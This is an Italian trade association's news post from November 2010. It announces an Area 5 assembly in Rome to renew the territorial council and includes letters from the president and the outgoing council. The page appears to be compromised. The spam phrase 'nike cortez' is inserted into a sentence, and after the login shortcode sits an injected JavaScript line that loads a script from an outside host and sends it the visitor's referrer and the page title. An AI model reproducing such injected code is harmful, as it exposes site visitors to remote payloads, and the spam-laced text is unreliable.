A Roma l’assemblea dei Soci Area 5 per il rinnovo del Consiglio Territoriale. Sergio Arioli invita alla partecipazione.

di Sergio Arioli - 26 novembre 2010
Classificato in: Mondo AIFIL, Presidenza, Vita AIFIL | Tag:

“In questo momento di estrema difficoltà del mercato, più ancora che in passato, abbiamo bisogno di AIFIL e della partecipazione attiva dei Soci”.

Sabato 27 novembre i Soci AIFIL dell’Area 5 (Abruzzo, Lazio, Sardegna e Umbria) si terrà a Roma, presso il ristorante La Contea, in via Tito, n. 50 (Piazza dei Navigatori), l’Assemblea per il rinnovo delle cariche sociali del Territorio.

Di seguito le lettere che il Presidente Sergio Arioli e il Consiglio Territoriale hanno inviato ai Soci dell’Area in data 22-11-2010.

“Cari Soci,

In base allo Statuto AIFIL, scade quest’anno il secondo mandato del Segretario Territoriale Claudio Rossi e i Soci dell’Area 5 si riuniranno a Roma per il rinnovo delle cariche sociali nel territorio.

Mi aggiungo al Consiglio Territoriale nell’esortare alla partecipazione e al voto tutti soci dell’area 5, approfittando subito di questa occasione per ringraziare a nome di tutta l’Associazione il Segretario e il Consiglio Territoriale uscenti per l’impegno profuso in questi anni.

Un impegno che il Segretario Claudio Rossi e il Consiglio nike cortez Territoriale hanno portato avanti lavorando costantemente, come recita il nostro Statuto, per salvaguardare gli interessi dei Soci nei confronti di Terzi, Autorità ed Enti.

AIFIL[IN]FORMA on line informerà tutta l’Associazione sui lavori e sugli esiti dell’assemblea ma, anche e soprattutto, si occuperà di far conoscere e di approfondire l’operato di Claudio Rossi e del Consiglio territoriale uscente.

In questo momento di estrema difficoltà del mercato, più ancora che in passato, abbiamo bisogno di AIFIL e della partecipazione attiva dei Soci.

Ora tocca ai Soci dell’Area 5 andare al voto per eleggere i propri rappresentanti: ci auguriamo che la partecipazione a questa Assemblea sia numerosa, per garantire che le preferenze di tutti vengano accolte con la finalità di creare un gruppo coeso e motivato nella tutela dei diritti di categoria.

Buon voto a tutti!”

Sergio Arioli

Presidente AIFIL

Cari Soci,

Come sapete, sabato 27 novembre i Soci dell’Area 5 di AIFIL (Abruzzo, Lazio, Sardegna e Umbria) si riuniranno a Roma per un’importante incontro, in Assemblea Territoriale per il rinnovo delle cariche sociali nel territorio.
Vogliamo rivolgervi il nostro più caloroso invito a partecipare e a votare il nuovo team.
In base all’articolo 28 dello statuto AIFIL, scade infatti nel 2010 il secondo mandato del Segretario Territoriale Claudio Rossi, che quest’anno non sarà più eleggibile.

Claudio Rossi è stato eletto Segretario Territoriale nel 2004 e, con la collaborazione del Vicesegretario Maurizio De Renzis, ha terminato il mandato triennale nel 2007. Sempre nel 2007 è stato riconfermato e, con la collaborazione del Vicesegretario, Claudio Rossi si accinge oggi a passare le consegne.

Il programma che il Segretario e il nutrito Consiglio Territoriale, con l’ausilio dei Rappresentanti Provinciali, in questi anni si sono posti, a breve e medio termine, è stato principalmente quello di informare e formare sugli aspetti tecnici i soci, invitando anche gli altri operatori del settore a questi incontri.

A questo scopo, sono stati organizzati seminari tecnici teorici/pratici e Assemblee nelle Regioni di pertinenza dell’Area. In più, i Consiglieri, in qualità di rappresentanti dell’Associazione, sono intervenuti in quei Municipi che applicano il Regolamento Comunale in modo contorto,  partecipando anche a:

- “Osservatorio della Pubblicità in città” presso l’Assessorato del Comune di Roma,

- incontri nella Commissione Commercio del Comune di Roma,

- riunioni indette dalla Regione Lazio,

- riunioni indette dalla Provincia di Roma per il riordino degli impianti pubblicitari.

Cosa di questi ultimi giorni è l’applicazione, da parte degli Enti Locali, della Legge regionale sull’inquinamento luminoso, per la quale il Consiglio Territoriale, sta provvedendo a richiedere, con il supporto del comitato AIFIL ”Insegne e Diritto”, un incontro con la Regione Lazio allo scopo di dimostrare tecnicamente che detta legge non si può applicare sulle insegne d’esercizio.

Il nuovo Consiglio Territoriale sarà formato, ne siamo certi, da una squadra compatta, coesa e animata dalla volontà di mettere in campo le sinergie necessarie a risolvere le diverse difficoltà della categoria. Il tutto, sulla base dello Statuto AIFIL, che si propone di tutelare gli interessi dei soci nei confronti di terzi, autorità ed Enti.

Nell’invitare nuovamente tutti i Soci dell’Area a partecipare attivamente all’assemblea e al voto, chiudiamo con una “famosa” frase del Segretario uscente Claudio Rossi, che ringraziamo di nuovo per l’impegno dimostrato in questi anni e che speriamo sia motivante per tutti: “Numerosi e uniti, possiamo raggiungere ottimi risultati”.

Consiglio Territoriale Area 5

Documenti allegati

  • Convocazione Assemblea Area 5. 27-11-2010

[emember_protected]

Convocazione Assemblea Area 5. 27-11-2010
Convocazione Assemblea Area 5. 27-11-2010

[/emember_protected]

[wp_eMember_login_form:end]s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed